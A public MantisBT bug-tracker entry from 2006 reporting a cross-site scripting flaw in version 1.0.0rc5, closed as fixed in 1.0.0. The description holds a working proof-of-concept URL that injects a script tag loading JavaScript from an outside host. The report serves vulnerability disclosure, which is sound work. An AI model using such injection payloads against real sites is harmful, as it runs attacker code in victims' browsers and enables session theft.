0006659: Cross site scripting vulnerability - MantisBT - Signup temporarily disabled due to spam

ID	Project	Category	View Status	Date Submitted	Last Update

0006659	mantisbt	security	public	2006-02-01 16:56	2006-10-09 11:55

Reporter	maxi	Assigned To	thraxisp
Priority	normal	Severity	major	Reproducibility	always
Status	closed	Resolution	fixed
Product Version	1.0.0rc5
Fixed in Version	1.0.0

Summary	0006659: Cross site scripting vulnerability
Description	Try this, for example: http://bugs.mantisbt.org/view_all_bug_page.php/"><script%20src=http://own-hero.de/~maxi/xss.js>/xss Have fun :)
Tags	No tags attached.

thraxisp 2006-02-02 22:59 reporter ~0012073	Fixed in CVS. config_defaults_inc.php -> 1.283.2.1.2.1.2.1.2.1